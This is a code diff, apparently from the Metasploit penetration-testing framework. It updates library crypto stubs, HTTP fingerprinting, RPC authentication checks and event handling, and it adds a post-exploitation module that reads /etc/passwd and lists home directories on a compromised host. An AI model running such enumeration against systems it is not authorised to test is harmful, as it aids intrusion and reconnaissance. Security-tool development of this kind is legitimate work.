FLAG_COMPRESS = 0x01
FLAG_ENCRYPT = 0x02
@@ -249,22 +249,31 @@ def self.post_process(lib, name, data)
#
# This is a stub crypto handler that performs a basic XOR
- # operation against a fixed one byte key
+ # operation against a fixed one byte key. The two usable IDs
+ # are 12345600 and 00000000
#
def self.encrypt_12345600(data)
- data.unpack("C*").map{ |c| c ^ 0x90 }.pack("C*")
+ encrypt_00000000(data)
end
def self.decrypt_12345600(data)
- encrypt_12345600(data)
+ encrypt_00000000(data)
end
- def self.cache
- @@cache
+ def self.encrypt_00000000(data)
+ data.unpack("C*").map{ |c| c ^ 0x90 }.pack("C*")
end
-
-
+ def self.decrypt_00000000(data)
+ encrypt_00000000(data)
+ end
+
+ #
+ # Expose the cache to callers
+ #
+ def self.cache
+ @@cache
+ end
end
@@ -330,6 +339,7 @@ def self.cache
4 bytes: "FAST"
4 bytes: NBO header length
+ 4 bytes: NBO flags (24-bit crypto ID, 8 bit modes)
[
4 bytes: name length (0 = End of Names)
4 bytes: data offset
@@ -343,6 +353,12 @@ def self.cache
module Kernel #:nodoc:all
alias :fastlib_original_require :require
+
+ #
+ # Store the CWD when were initially loaded
+ # required for resolving relative paths
+ #
+ @@fastlib_base_cwd = ::Dir.pwd
#
# This method hooks the original Kernel.require to support
@@ -360,22 +376,16 @@ def fastlib_require(name)
return false if fastlib_already_loaded?(name)
return false if fastlib_already_tried?(name)
- # TODO: Implement relative path $: checks and adjust the
- # search path within archives to match.
-
- $:.map{ |path| ::Dir["#{path}/*.fastlib"] }.flatten.uniq.each do |lib|
+ # XXX Implement relative search paths within archives
+ $:.map{ |path|
+ (path =~ /^([A-Za-z]\:|\/)/ ) ? path : ::File.expand_path( ::File.join(@@fastlib_base_cwd, path) )
+ }.map{ |path| ::Dir["#{path}/*.fastlib"] }.flatten.uniq.each do |lib|
data = FastLib.load(lib, name)
next if not data
$" << name
- begin
- Object.class_eval(data)
- rescue ::Exception => e
- opath,oerror = e.backtrace.shift.split(':', 2)
- e.backtrace.unshift("#{lib}::#{name}:#{oerror}")
- raise e
- end
-
+ Object.class_eval(data, lib + "::" + name)
+
return true
end
View
25 lib/msf/core/db.rb
@@ -1475,6 +1475,7 @@ def reports(wspace=workspace)
#
# opts can contain
# +:options+:: a hash of options for accessing this particular web site
+ # +:info+:: if present, report the service with this info
#
# Duplicate records for a given host, port, vhost combination will be overwritten
#
@@ -1487,13 +1488,15 @@ def report_web_site(opts)
port = nil
name = nil
serv = nil
+ info = nil
if opts[:service] and opts[:service].kind_of?(Service)
serv = opts[:service]
else
addr = opts[:host]
port = opts[:port]
name = opts[:ssl] ? 'https' : 'http'
+ info = opts[:info]
if not (addr and port)
raise ArgumentError, "report_web_site requires service OR host/port/ssl"
end
@@ -1528,8 +1531,12 @@ def report_web_site(opts)
if opts.keys.include?(:ssl) or serv.name.to_s.empty?
name = opts[:ssl] ? 'https' : 'http'
serv.name = name
- serv.save!
end
+ # Add the info if it's there.
+ unless info.to_s.empty?
+ serv.info = info
+ end
+ serv.save! if serv.changed?
=begin
host.updated_at = host.created_at
host.state = HostState::Alive
@@ -4875,19 +4882,11 @@ def find_qualys_asset_vuln_refs(doc)
next unless vuln.elements['QID'] && vuln.elements['QID'].first
qid = vuln.elements['QID'].first.to_s
vuln_refs[qid] ||= []
- if vuln.elements["CVE_ID_LIST/CVE_ID/ID"]
- vuln.elements["CVE_ID_LIST/CVE_ID/ID"].each do |ref|
- next unless ref
- next unless ref.to_s[/^C..-[0-9\-]{9}/]
- vuln_refs[qid] << ref.to_s.gsub(/^C../, "CVE")
- end
+ vuln.elements.each('CVE_ID_LIST/CVE_ID') do |ref|
+ vuln_refs[qid].push('CVE-' + /C..-([0-9\-]{9})/.match(ref.elements['ID'].text.to_s)[1])
end
- if vuln.elements["BUGTRAQ_ID_LIST/BUGTRAQ_ID/ID"]
- vuln.elements["BUGTRAQ_ID_LIST/BUGTRAQ_ID/ID"].each do |ref|
- next unless ref
- next unless ref.to_s[/^[0-9]{1,9}/]
- vuln_refs[qid] << "BID-#{ref}"
- end
+ vuln.elements.each('BUGTRAQ_ID_LIST/BUGTRAQ_ID') do |ref|
+ vuln_refs[qid].push('BID-' + ref.elements['ID'].text.to_s)
end
end
return vuln_refs
View
8 lib/msf/core/event_dispatcher.rb
@@ -58,6 +58,7 @@ class EventDispatcher
def initialize(framework)
self.framework = framework
self.general_event_subscribers = []
+ self.custom_event_subscribers = []
self.exploit_event_subscribers = []
self.session_event_subscribers = []
self.db_event_subscribers = []
@@ -181,7 +182,7 @@ def method_missing(name, *args)
sub.send(name, *args)
end
else
- general_event_subscribers.each do |sub|
+ (general_event_subscribers + custom_event_subscribers).each do |sub|
next if not sub.respond_to?(name)
sub.send(name, *args)
found = true
@@ -198,9 +199,7 @@ def method_missing(name, *args)
remove_event_subscriber(self.send(subscribers), *args)
end
end
- if not found
- elog("Event dispatcher received an unhandled event: #{name}")
- end
+
return found
end
@@ -222,6 +221,7 @@ def remove_event_subscriber(array, subscriber) # :nodoc:
end
attr_accessor :general_event_subscribers # :nodoc:
+ attr_accessor :custom_event_subscribers # :nodoc:
attr_accessor :exploit_event_subscribers # :nodoc:
attr_accessor :session_event_subscribers # :nodoc:
attr_accessor :db_event_subscribers # :nodoc:
View
6 lib/msf/core/exploit/capture.rb
@@ -99,7 +99,11 @@ def open_pcap(opts={})
self.capture = ::Pcap.open_offline(cap)
else
dev ||= ::Pcap.lookupdev
- system("ifconfig", dev, "up")
+
+ unless RUBY_PLATFORM == "i386-mingw32"
+ system("ifconfig", dev, "up")
+ end
+
self.capture = ::Pcap.open_live(dev, len, true, tim)
if arp
self.arp_capture = ::Pcap.open_live(dev, 512, true, tim)
View
35 lib/msf/core/exploit/http/client.rb
@@ -543,7 +543,7 @@ def vhost
# Returns the boolean indicating SSL
#
def ssl
- ((datastore.default?('SSL') and rport.to_i == 443) or datastore['SSL'])
+ ((datastore.default?('SSL') and [443,3790].include?(rport.to_i)) or datastore['SSL'])
end
#
@@ -603,20 +603,13 @@ def http_fingerprint(opts={})
# Bail if we don't have anything to fingerprint
return if not res
-
+
# From here to the end simply does some pre-canned combining and custom matches
# to build a human-readable string to store in service.info
extras = []
-
- case res.code
- when 301,302
- extras << "#{res.code}-#{res.headers['Location']}"
- when 401
- extras << "#{res.code}-#{res.headers['WWW-Authenticate']}"
- when 403
- extras << "#{res.code}-#{res.headers['WWW-Authenticate']||res.message}"
- when 500 .. 599
- extras << "#{res.code}-#{res.message}"
+
+ if res.headers['Set-Cookie'] =~ /^vmware_soap_session/
+ extras << "VMWare Web Services"
end
if (res.headers['X-Powered-By'])
@@ -637,7 +630,7 @@ def http_fingerprint(opts={})
when /openAboutWindow.*\>DD\-WRT ([^\<]+)\</
extras << "DD-WRT #{$1.strip}"
- when /ID_ESX_Welcome/
+ when /ID_ESX_Welcome/, /ID_ESX_VIClientDesc/
extras << "VMware ESX Server"
when /Test Page for.*Fedora/
@@ -657,18 +650,28 @@ def http_fingerprint(opts={})
end
if datastore['RPORT'].to_i == 3790
- if res and res.code == 302 and res.headers and res.headers['Location'] =~ /[\x5c\x2f](login|setup)$/
- if res['Server'] =~ /^thin.*No Hup$/
+ if res.code == 302 and res.headers and res.headers['Location'] =~ /[\x5c\x2f](login|setup)$/
+ if res['Server'] =~ /^(thin.*No Hup)|(nginx[\x5c\x2f][\d\.]+)$/
extras << "Metasploit"
end
end
end
+ case res.code
+ when 301,302
+ extras << "#{res.code}-#{res.headers['Location']}"
+ when 401
+ extras << "#{res.code}-#{res.headers['WWW-Authenticate']}"
+ when 403
+ extras << "#{res.code}-#{res.headers['WWW-Authenticate']||res.message}"
+ when 500 .. 599
+ extras << "#{res.code}-#{res.message}"
+ end
+
info = "#{res.headers['Server']}"
info << " ( #{extras.join(", ")} )" if extras.length > 0
# Report here even if info is empty since the fact that we didn't
# return early means we at least got a connection and the service is up
- ssl = datastore['SSL']
report_web_site(:host => rhost, :port => rport, :ssl => ssl, :vhost => vhost, :info => info.dup)
info
end
View
1 lib/msf/core/exploit/http/server.rb
@@ -112,6 +112,7 @@ def start_service(opts = {})
# provided.
uopts = {
'Proc' => Proc.new { |cli, req|
+ framework.events.on_httpserver_request(self, cli, req)
on_request_uri(cli, req)
},
'Path' => resource_uri
View
8 lib/msf/core/exploit/mssql.rb
@@ -73,10 +73,10 @@ def initialize(info = {})
], Msf::Exploit::Remote::MSSQL)
register_advanced_options(
[
- OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
- File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
- ]),
- OptString.new('DOMAIN', [ true, 'The domain to use for windows authentification', 'WORKSTATION'])
+ OptPath.new('HEX2BINARY', [ false, "The path to the hex2binary script on the disk",
+ File.join(Msf::Config.install_root, "data", "exploits", "mssql", "h2b")
+ ]),
+ OptString.new('DOMAIN', [ true, 'The domain to use for windows authentication', 'WORKSTATION'])
], Msf::Exploit::Remote::MSSQL)
register_autofilter_ports([ 1433, 1434, 1435, 14330, 2533, 9152, 2638 ])
register_autofilter_services(%W{ ms-sql-s ms-sql2000 sybase })
View
2 lib/msf/core/exploit/postgres.rb
@@ -245,7 +245,7 @@ def postgres_password
if datastore['PASSWORD'].to_s.size > 0
datastore['PASSWORD'].to_s
else
- 'INVALID_' + Rex::Text.rand_text_alpha(rand(6))
+ 'INVALID_' + Rex::Text.rand_text_alpha(rand(6) + 1)
end
end
View
33 lib/msf/core/post/unix/enum_user_dirs.rb
@@ -0,0 +1,33 @@
+module Msf
+class Post
+module Unix
+ include ::Msf::Post::Common
+
+ # returns all user directories found
+ def enum_user_directories
+ user_dirs = []
+
+ # get all user directories from /etc/passwd
+ read_file("/etc/passwd").each_line do |passwd_line|
+ user_dirs << passwd_line.split(/:/)[5]
+ end
+
+ # also list other common places for home directories in the event that
+ # the users aren't in /etc/passwd (LDAP, for example)
+ case session.platform
+ when 'osx'
+ user_dirs << cmd_exec('ls /Users').each_line.map { |l| "/Users/#{l}" }
+ else
+ user_dirs << cmd_exec('ls /home').each_line.map { |l| "/home/#{l}" }
+ end
+
+ user_dirs.flatten!
+ user_dirs.sort!
+ user_dirs.uniq!
+ user_dirs.compact!
+
+ user_dirs
+ end
+end
+end
+end
View
4 lib/msf/core/rpc/v10/rpc_auth.rb
@@ -12,6 +12,10 @@ class RPC_Auth < RPC_Base
def rpc_login_noauth(user,pass)
+ if not (user.kind_of?(::String) and pass.kind_of?(::String))
+ error(401, "Login Failed")
+ end
+
# handle authentication here
fail = true
self.users.each do |u|
View
5 lib/msf/core/rpc/v10/service.rb
@@ -198,6 +198,11 @@ def remove_user(user)
def authenticate(token)
stale = []
+
+ if not (token and token.kind_of?(::String))
+ return false
+ end
+
# Force the encoding to ASCII-8BIT
token = token.unpack("C*").pack("C*")